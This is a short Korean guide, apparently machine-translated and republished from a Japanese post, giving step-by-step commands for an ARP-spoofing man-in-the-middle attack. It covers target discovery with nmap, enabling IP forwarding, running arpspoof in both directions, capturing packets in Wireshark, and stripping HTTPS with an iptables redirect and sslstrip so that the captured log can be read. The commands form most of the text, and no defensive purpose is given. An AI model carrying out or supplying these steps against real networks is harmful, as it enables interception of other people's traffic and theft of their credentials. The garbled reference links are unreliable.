ARP 스푸핑 절차 (중간자 공격, MITM)
1. 공격 대상의 IP 주소 취득
ifconfig
arp -a
nmap -F 192.168.XXX.XXX/24
등등
2. 공격자의 PC를 경유하는 패킷을 포워드시키기 위해 IP 포워딩을 유효
1에서 유효
echo 1 > /proc/sys/net/ipv4/ip_forward
0으로 비활성화
echo 0 > /proc/sys/net/ipv4/ip_forward
3. ARP 테이블 재작성
NIC를 wlan0으로 지정하고 192.168.100.123 ARP 테이블의 192.168.100.124 MAC 주소를 공격자 (자신)의 MAC 주소로 다시 씁니다.
sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124
NIC를 wlan0으로 지정하고 192.168.100.124 ARP 테이블의 192.168.100.123 MAC 주소를 공격자 (자신)의 MAC 주소로 다시 씁니다.
sudo arpspoof -i wlan0 -t 192.168.100.124 192.168.100.123
주의 : 송신과 수신 모두 공격자 PC를 경유하여 통신하도록 하기 위해 별도 터미널에서 2회 실행해야 한다!
4. 패킷 캡처
wireshark
5. ssl 스트립
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
cat sslstrip.log
6. 참고문헌
htps : // 코 m / 버섯 울 / ms / 아 4d98c5 아 55243b5 아후 96
htps //w w. s에서 멋지다. 네 t/소니 c군/아rp-39782351
htps : // xy · slst p
h tps : // 쓰레기 l 누출. 코 m / 쿠에 s 치온 s-594005. htm
htps : // 네토…
htps //w w. 아 t r t. 이. jp / ai t / archi c0s / 0305/09 / 네 ws003_3. HTML
h tps : // 미스 s와 네- f-세. 네스케. 이 m / n w-bashi c / ええ r 네 t / g
htps : // xy · ds s_s 포오 f
Reference
이 문제에 관하여(ARP 스푸핑 절차 (중간자 공격, MITM)), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/75u2u/items/0e35652ff3810d74d09b텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)